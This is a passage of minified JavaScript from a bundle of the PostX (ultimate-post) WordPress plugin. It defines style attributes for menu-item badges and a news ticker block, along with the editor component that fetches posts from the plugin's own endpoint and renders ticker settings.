.ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% - {{contentHorizontalPosition}} ); width: calc( 100% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentBlock",condition:"==",value:"hasListMenuParent"},{key:"contentHorizontalPositionType",condition:"==",value:"toRight"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks,\n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { left: calc( 100% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% - {{contentHorizontalPosition}} ); width: calc( 100% + {{contentHorizontalPosition}} ); }"},{depends:[{key:"parentBlock",condition:"==",value:"hasListMenuParent"},{key:"contentHorizontalPositionType",condition:"==",value:"toLeft"}],selector:"\n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                        .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { right: calc( 100% + {{contentHorizontalPosition}} );} \n                        {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { left: calc( 0% + 0px ); width: calc( 100% + {{contentHorizontalPosition}} ); }"}]},contentVerticalPositionType:{type:"string",default:"toBottom",style:[{depends:[{key:"parentMenuInline",condition:"==",value:!1}]}]},contentVerticalPosition:{type:"object",default:{lg:"0",ulg:"px"},style:[{depends:[{key:"parentMenuInline",condition:"==",value:!0}],selector:"\n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                            .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { top: calc( 100% + {{contentVerticalPosition}} );} \n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { top: calc( 0% - {{contentVerticalPosition}} ); height: calc( 100% + {{contentVerticalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!1},{key:"contentVerticalPositionType",condition:"==",value:"toBottom"}],selector:"\n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                            .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { top: calc( 0% + {{contentVerticalPosition}} );} \n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { top: calc( 0% - {{contentVerticalPosition}} ); height: calc( 100% + {{contentVerticalPosition}} ); }"},{depends:[{key:"parentMenuInline",condition:"==",value:!1},{key:"contentVerticalPositionType",condition:"==",value:"toTop"}],selector:"\n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content > .block-editor-inner-blocks, \n                            .postx-page {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content { top: calc( 100% - {{contentVerticalPosition}} );} \n                            {{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-content::before { top: 0; height: calc( 0% + {{contentVerticalPosition}} ); }"}]},enableBadge:{type:"boolean",default:!1},badgeText:{type:"string",default:"BADGE"},badgeTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:16,unit:"px"},transform:"uppercase",decoration:"none",family:"",weight:500},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"]'}]},badgeColor:{type:"string",default:"#fff",style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { color:{{badgeColor}} }'}]},badgeBg:{type:"object",default:{openColor:1,type:"color",color:"#037FFF",gradient:{}},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"]'}]},badgeBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"]'}]},badgeRadius:{type:"object",default:{lg:{top:"12",bottom:"12",left:"12",right:"12",unit:"px"}},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { border-radius:{{badgeRadius}}; }'}]},badgePadding:{type:"object",default:{lg:{top:"4",bottom:"4",left:"12",right:"12",unit:"px"}},style:[{selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { padding:{{badgePadding}}; }'}]},badgePosition:{type:"string",default:"top"},badgeSpacing:{type:"object",default:{lg:"8",ulg:"px"},style:[{depends:[{key:"badgePosition",condition:"==",value:"top"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { bottom: calc( 100% + {{badgeSpacing}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"right"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { left: calc( 100% + {{badgeSpacing}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"bottom"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { top: calc( 100% + {{badgeSpacing}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"left"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { right: calc( 100% + {{badgeSpacing}} ); }'}]},badgePositionValue:{type:"object",default:{lg:"10",ulg:"px"},style:[{depends:[{key:"badgePosition",condition:"==",value:"top"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { left: calc( 0% + {{badgePositionValue}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"right"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { top: calc( 0% + {{badgePositionValue}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"bottom"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { left: calc( 0% + {{badgePositionValue}} ); }'},{depends:[{key:"badgePosition",condition:"==",value:"left"}],selector:'.ultp-menu-item-badge[data-currentbid="{{ULTP}}"] { top: calc( 0% + {{badgePositionValue}} ); }'}]},itemTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:400,transform:"capitalize"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text"}]},itemColor:{type:"string",default:"",style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColor}}; }"}]},itemBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemColorHvr:{type:"string",default:"",style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text { color: {{itemColorHvr}}; }"}]},itemBgHvr:{type:"object",default:{openColor:0,type:"color",color:"#FFFFFF"},style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemShadowHvr:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemBorderHvr:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".ultpMenuCss {{ULTP}}.wp-block-ultimate-post-menu-item:hover > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container"}]},itemRadius:{type:"object",default:{top:"",right:"",bottom:"",left:"",unit:"px"},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container { border-radius:{{itemRadius}}; }"}]},itemPadding:{type:"object",default:{lg:{top:"",right:"",bottom:"",left:"",unit:"px"}},style:[{selector:".ultpMenuCss{{ULTP}} > .ultp-menu-item-wrapper > .ultp-menu-item-label-container { padding:{{itemPadding}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-menu-item-wrapper { z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} { display:none; }"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} { display:none; }"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} { display:none; }"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}})},47214:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(43581),s=l(31760),p=l(64766);const{__}=wp.i18n,{dateI18n:c}=wp.date,{InspectorControls:u,useBlockProps:d}=wp.blockEditor,{useEffect:m,useState:g,useRef:y,Fragment:b}=wp.element,{Spinner:v,Placeholder:h}=wp.components,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const t=y(null),[l,w]=g("Content"),[x,T]=g({postsList:[],loading:!0,error:!1,section:"Content"}),{setAttributes:_,name:C,className:E,attributes:S,clientId:P,attributes:{blockId:L,previewImg:I,advanceId:B,tickerHeading:U,tickImageShow:M,navControlToggle:A,controlToggle:H,tickerType:N,headingText:j,tickTimeShow:Z,TickNavStyle:O,tickTxtStyle:R,TickNavIconStyle:D,timeBadgeType:z,timeBadgeDateFormat:F,currentPostId:W}}=e;function V(){x.error&&T({...x,error:!1}),x.loading||T({...x,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(e.attributes)}).then((e=>{T({...x,postsList:e,loading:!1})})).catch((e=>{T({...x,loading:!1,error:!0})}))}m((()=>{const e=P.substr(0,6),t=f(k(P));(0,a.qi)(_,t,W,P),L?L&&L!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||_({blockId:e})):(_({blockId:e}),ultp_data.archive&&"archive"==ultp_data.archive&&_({queryType:"archiveBuilder"}))}),[P]),m((()=>{const e=t.current;e?(0,a.Qr)(e,S)&&(V(),t.current=S):t.current=S}),[S]),m((()=>{V()}),[]);const G={setAttributes:_,name:C,attributes:S,setSection:w,section:l,clientId:P};let q;if(L&&(q=(0,i.Kh)(S,"ultimate-post/news-ticker",L,(0,a.k0)())),I)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:I});const $=d({...B&&{id:B},className:`ultp-block-${L} ${E}`});return(0,o.createElement)(b,null,(0,o.createElement)(u,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6845",store:G}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,store:G,title:__("General","ultimate-post"),include:[{position:1,data:{type:"select",key:"tickerType",label:__("Ticker Type","ultimate-post"),options:[{value:"vertical",label:__("Vertical","ultimate-post")},{value:"horizontal",label:__("Horizontal","ultimate-post")},{pro:!0,value:"marquee",label:__("Marquee","ultimate-post")},{pro:!0,value:"typewriter",label:__("Typewriter","ultimate-post")}]}},{position:2,data:{type:"select",key:"tickerDirectionVer",label:__("Direction","ultimate-post"),options:[{value:"up",label:__("Up","ultimate-post")},{value:"down",label:__("Down","ultimate-post")}]}},{position:3,data:{type:"select",key:"tickerDirectionHorizon",label:__("Direction","ultimate-post"),options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:4,data:{type:"range",key:"tickerSpeed",min:1e3,max:1e4,step:100,label:__("Speed","ultimate-post")}},{position:5,data:{type:"range",key:"marqueSpeed",min:1,max:10,step:1,label:__("Speed (Fast to Slow)","ultimate-post")}},{position:6,data:{type:"select",key:"tickerAnimation",label:__("Animation","ultimate-post"),options:[{value:"slide",label:__("Slide","ultimate-post")},{value:"fadein",label:__("Fade In","ultimate-post")},{value:"fadeout",label:__("Fade Out","ultimate-post")}]}},{position:7,data:{type:"select",key:"typeAnimation",label:__("Animation","ultimate-post"),options:[{value:"normal",label:__("Normal","ultimate-post")},{value:"fadein",label:__("Fade In","ultimate-post")},{value:"fadeout",label:__("Fade Out","ultimate-post")}]}},{position:8,data:{type:"toggle",key:"tickerPositionEna",pro:!0,label:__("Position sticky","ultimate-post")}},{position:9,data:{type:"select",key:"tickerPosition",label:__("Select Position","ultimate-post"),options:[{value:"up",label:__("Up","ultimate-post")},{value:"down",label:__("Down","ultimate-post")}]}},{position:10,data:{type:"toggle",key:"pauseOnHover",label:__("Pause On Hover","ultimate-post")}},{position:11,data:{type:"toggle",key:"openInTab",label:__("Open In New Tab","ultimate-post")}}]}),(0,o.createElement)(a.lA,{store:G}),(0,o.createElement)(a.T,{depend:"navControlToggle",store:G,title:__("Ticker Navigator","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"controlToggle",label:__("Show Toggle","ultimate-post")}},{position:2,data:{type:"select",key:"TickNavStyle",label:__("Ticker Navigator Layout","ultimate-post"),options:[{value:"nav1",label:__("Style 1","ultimate-post")},{value:"nav2",label:__("Style 2","ultimate-post")},{value:"nav3",label:__("Style 3","ultimate-post")},{value:"nav4",label:__("Style 4","ultimate-post")}]}},{position:3,data:{type:"select",key:"TickNavIconStyle",label:__("Ticker Icon","ultimate-post"),options:[{value:"Angle2",label:__("Icon 1","ultimate-post")},{value:"Angle",label:__("Icon 2","ultimate-post")},{value:"ArrowLg",label:__("Icon 3","ultimate-post")}]}},{position:4,data:{type:"dimension",key:"tickNavSize",step:1,unit:!0,responsive:!0,label:__("Icon Padding","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"TickNavColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"TickNavBg",label:__("Icon Bg Color","ultimate-post")},{type:"border",key:"tickNavBorder",label:__("Border","ultimate-post")},{type:"separator",key:"TickNavPause",label:__("Pause Arrow Icon","ultimate-post")},{type:"color",key:"PauseColor",label:__("Pause Color","ultimate-post")},{type:"color2",key:"PauseBg",label:__("Pause Bg Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"TickNavHovColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"TickNavHovBg",label:__("Hover Background","ultimate-post")},{type:"border",key:"tickNavHoverBorder",label:__("Border","ultimate-post")},{type:"separator",key:"TickNavPause",label:__("Pause Arrow Icon","ultimate-post")},{type:"color",key:"PauseHovColor",label:__("Pause Hover Color","ultimate-post")},{type:"color2",key:"PauseHovBg",label:__("Pause Hover Bg Color","ultimate-post")}]}]}}]}),(0,o.createElement)(a.T,{depend:"tickerHeading",store:G,title:__("Ticker Label","ultimate-post"),include:[{position:1,data:{type:"select",key:"tickShapeStyle",label:__("Ticker Shape","ultimate-post"),options:[{value:"normal",label:__("Normal","ultimate-post")},{pro:!0,value:"small",label:__("Small Shape","ultimate-post")},{pro:!0,value:"medium",label:__("Medium Shape","ultimate-post")},{pro:!0,value:"large",label:__("Large Shape","ultimate-post")}]}},{position:2,data:{type:"text",key:"headingText",label:__("Heading","ultimate-post")}},{position:3,data:{type:"color",key:"tickLabelColor",label:__("Color","ultimate-post")}},{position:4,data:{type:"color",key:"tickLabelBg",label:__("Label Background Color","ultimate-post")}},{position:5,data:{type:"typography",key:"tickLabelTypo",label:__("Typography","ultimate-post")}},{position:6,data:{type:"range",key:"tickLabelPadding",min:10,max:100,step:1,label:__("Padding","ultimate-post")}},{position:7,data:{type:"range",key:"tickLabelSpace",min:10,max:300,step:1,responsive:!0,label:__("Left Content Space","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:G,title:__("Ticker Body","ultimate-post"),include:[{position:1,data:{type:"range",key:"tickerContentHeight",min:10,max:100,step:1,label:__("Content Height","ultimate-post")}},{position:2,data:{type:"color",key:"tickBodyColor",label:__("List Text Color","ultimate-post")}},{position:3,data:{type:"color",key:"tickBodyHovColor",label:__("List Text Hover Color","ultimate-post")}},{position:4,data:{type:"color",key:"tickerBodyBg",label:__("Background Color","ultimate-post")}},{position:5,data:{type:"typography",key:"tickBodyTypo",label:__("Body Text Typography","ultimate-post")}},{position:6,data:{type:"color",key:"tickBodyBorderColor",label:__("Border Prefix Color","ultimate-post")}},{position:7,data:{type:"border",key:"tickBodyBorder",label:__("Border","ultimate-post")}},{position:8,data:{type:"dimension",key:"tickBodyRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:9,data:{type:"range",key:"tickBodySpace",step:1,min:10,max:100,responsive:!0,step:1,label:__("List Space Between","ultimate-post")}},{position:10,data:{type:"select",key:"tickTxtStyle",label:__("Ticker List Style","ultimate-post"),options:[{value:"normal",label:__("- None -","ultimate-post")},{value:"circle",label:__("Circle","ultimate-post")},{value:"box",label:__("Box","ultimate-post")},{value:"hand",label:__("Hand","ultimate-post")},{value:"right-sign",label:__("Right Sign Icon","ultimate-post")},{value:"right-bold",label:__("Right Bold Sign Icon","ultimate-post")}]}},{position:11,data:{type:"color",key:"tickBodyListColor",label:__("List Style Color","ultimate-post")}}]}),"typewriter"!=N&&(0,o.createElement)(a.T,{depend:"tickTimeShow",store:G,title:__("Time Badge","ultimate-post"),include:[{position:1,data:{type:"tag",key:"timeBadgeType",label:__("Badge Type","ultimate-post"),options:[{value:"days_ago",label:"Days Ago"},{value:"date",label:"Date"}]}},{position:5,data:{type:"select",key:"timeBadgeDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2024"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2024",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2024 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2024",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0}]}},{position:10,data:{type:"separator",key:"tickTimeBadge",label:__("Time Style","ultimate-post")}},{position:20,data:{type:"color",key:"timeBadgeColor",label:__("Time Badge Color","ultimate-post")}},{position:30,data:{type:"color2",key:"timeBadgeBg",label:__("Time Bg Color","ultimate-post")}},{position:40,data:{type:"typography",key:"timeBadgeTypo",label:__("Time Badge  Typography","ultimate-post")}},{position:50,data:{type:"dimension",key:"timeBadgeRadius",step:1,unit:!0,responsive:!0,label:__("Time Badge Radius","ultimate-post")}},{position:60,data:{type:"dimension",key:"timeBadgePadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}]}),(0,o.createElement)(a.T,{depend:"tickImageShow",store:G,title:__("Image","ultimate-post"),include:[{position:1,data:{type:"range",key:"tickImgWidth",min:10,max:100,step:1,label:__("image width","ultimate-post")}},{position:2,data:{type:"range",key:"tickImgSpace",min:10,max:100,step:1,label:__("image Space","ultimate-post")}},{position:3,data:{type:"dimension",key:"tickImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}}]})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:G}),(0,o.createElement)(a.Mg,{pro:!0,store:G}),(0,o.createElement)(a.iv,{store:G}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"query"},{type:"template"}],store:G}),(0,o.createElement)("div",$,q&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:q}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},function(){const e=(0,o.createElement)("button",{"aria-label":"Pause Current Post",className:"ultp-news-ticker-pause"}),t=p.ZP[`left${D}`],l=p.ZP[`right${D}`];return x.error?(0,o.createElement)(h,{label:__("Posts are not available","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):x.loading?(0,o.createElement)(h,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")}," ",(0,o.createElement)(v,null)):x.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap"},(0,o.createElement)("div",{className:`ultp-news-ticker-${O} ultp-nav-${D} ultp-newsTicker-wrap ultp-newstick-${N}`},U&&j&&(0,o.createElement)("div",{className:"ultp-news-ticker-label"},j," ",(0,o.createElement)("span",null)," "),(0,o.createElement)("div",{className:"ultp-news-ticker-box"},(0,o.createElement)("ul",{className:"ultp-news-ticker"},x.postsList.map(((e,t)=>(0,o.createElement)("li",{key:t},(0,o.createElement)("div",{className:`ultp-list-${R}`},(0,o.createElement)("a",null,(M&&e.image?e.image.thumbnail:void 0)&&(0,o.createElement)("img",{src:e.image.thumbnail,alt:e.title}),e.title.replaceAll("&#038;","").replaceAll("&#8217;","'").replaceAll("&#8221;",'"')),Z&&"typewriter"!=N&&(0,o.createElement)("span",{className:"ultp-ticker-timebadge"},"date"==z?c((0,a.De)(F),e.time):e.post_time+" ago"))))))),A&&(0,o.createElement)("div",{className:"ultp-news-ticker-controls  ultp-news-ticker-vertical-controls"},(0,o.createElement)("button",{"aria-label":"Show Previous Post",className:"ultp-news-ticker-arrow ultp-news-ticker-prev"},t),("nav1"==O||"nav3"==O||"nav4"==O)&&H&&e,(0,o.createElement)("button",{"aria-label":"Show Next Post",className:"ultp-news-ticker-arrow ultp-news-ticker-next"},l)))):(0,o.createElement)(h,{className:"ultp-backend-block-loading",label:__("No Posts found","ultimate-post")},(0,o.createElement)(v,null))}())))}},48627:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},tickerType:{type:"string",default:"vertical"},tickerPositionEna:{type:"boolean",default:!1},tickerPosition:{type:"string",default:"up",style:[{depends:[{key:"tickerPositionEna",condition:"==",value:!0},{key:"tickerPosition",condition:"==",value:"up"}],selector:"{{ULTP}} .ultp-news-sticky .ultp-newsTicker-wrap { position: fixed;width: 100%;top: 0;z-index: 101; left: 0; } \n          .admin-bar .ultp-news-sticky .ultp-newsTicker-wrap { top: 32px !important; }"},{depends:[{key:"tickerPositionEna",condition:"==",value:!0},{key:"tickerPosition",condition:"==",value:"down"}],selector:"{{ULTP}} .ultp-news-sticky .ultp-newsTicker-wrap { position: fixed;width: 100%;bottom: 0; z-index: 9999999;left: 0; }"}]},tickerHeading:{type:"boolean",default:!0},tickTimeShow:{type:"boolean",default:!0,style:[{depends:[{key:"tickerType",condition:"!=",value:"typewriter"}]}]},tickImageShow:{type:"boolean",default:!1},navControlToggle:{type:"boolean",default:!0},controlToggle:{type:"boolean",default:!0,style:[{depends:[{key:"navControlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"!=",value:"nav2"}]}]},pauseOnHover:{type:"boolean",default:!0},tickerDirectionVer:{type:"string",default:"up",style:[{depends:[{key:"tickerType",condition:"==",value:"vertical"},{key:"tickerAnimation",condition:"==",value:"slide"}]}]},tickerDirectionHorizon:{type:"string",default:"left",style:[{depends:[{key:"tickerType",condition:"==",value:"horizontal"},{key:"tickerAnimation",condition:"==",value:"slide"}]},{depends:[{key:"tickerType",condition:"==",value:"marquee"}]}]},tickerSpeed:{type:"string",default:"4000",style:[{depends:[{key:"tickerType",condition:"!=",value:"marquee"}]}]},marqueSpeed:{type:"string",default:"10",style:[{depends:[{key:"tickerType",condition:"==",value:"marquee"}]}]},tickerSpeedTypewriter:{type:"string",default:"50",style:[{depends:[{key:"tickerType",condition:"==",value:"typewriter"}]}]},tickerAnimation:{type:"string",default:"slide",style:[{depends:[{key:"tickerType",condition:"!=",value:"marquee"},{key:"tickerType",condition:"!=",value:"typewriter"}]}]},typeAnimation:{type:"string",default:"fadein",style:[{depends:[{key:"tickerType",condition:"==",value:"typewriter"}]}]},openInTab:{type:"boolean",default:!1},headingText:{type:"string",default:"News Ticker"},TickNavStyle:{type:"string",default:"nav1",style:[{depends:[{key:"navControlToggle",condition:"==",value:!0}]}]},TickNavIconStyle:{type:"string",default:"Angle2",style:[{depends:[{key:"navControlToggle",condition:"==",value:!0}]}]},tickNavSize:{type:"object",default:{lg:{top:6,bottom:6,left:6,right:6,unit:"px"}},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-arrow { padding:{{tickNavSize}} !important; height: auto !important; width: auto !important; }"}]},TickNavColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:after { border-color:{{TickNavColor}}}\n          {{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow svg { color:{{TickNavColor}}}"},{depends:[{key:"TickNavIconStyle",condition:"==",value:"icon2"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:after ,\n          {{ULTP}} button.ultp-news-ticker-arrow:before { border-right-color:{{TickNavColor}}; border-left-color: {{TickNavColor}}; } "}]},TickNavBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow"},{depends:[{key:"TickNavStyle",condition:"!=",value:"nav1"},{key:"TickNavStyle",condition:"!=",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls"}]},tickNavBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-arrow"}]},TickNavHovColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover:after { border-color:{{TickNavHovColor}}}\n          {{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow svg:hover { color:{{TickNavHovColor}}}"},{depends:[{key:"TickNavIconStyle",condition:"==",value:"icon2"}],selector:"{{ULTP}} button.ultp-news-ticker-arrow:hover:after ,\n          {{ULTP}} button.ultp-news-ticker-arrow:hover:before{ border-right-color:{{TickNavHovColor}}; border-left-color:{{TickNavHovColor}}; } "}]},TickNavHovBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav3"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover"},{depends:[{key:"TickNavStyle",condition:"!=",value:"nav1"},{key:"TickNavStyle",condition:"!=",value:"nav2"},{key:"TickNavStyle",condition:"!=",value:"nav3"}],selector:"{{ULTP}} .ultp-news-ticker-controls:hover"}]},tickNavHoverBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-arrow:hover"}]},TickNavPause:{type:"string",default:"Pause Icon Style",style:[{depends:[{key:"TickNavStyle",condition:"!=",value:"nav2"},{key:"controlToggle",condition:"==",value:!0}]}]},PauseColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"TickNavStyle",condition:"!=",value:"nav2"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:before,\n          {{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:before,\n          {{ULTP}} .ultp-news-ticker-nav4 button.ultp-news-ticker-pause:before { border-color:{{PauseColor}};}"}]},PauseHovColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"TickNavIconStyle",condition:"!=",value:"icon2"},{key:"controlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"==",value:"nav1"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:hover:before { border-color:{{PauseHovColor}};}"},{depends:[{key:"TickNavIconStyle",condition:"!=",value:"icon2"},{key:"controlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"==",value:"nav3"}],selector:"{{ULTP}} .ultp-news-ticker-controls 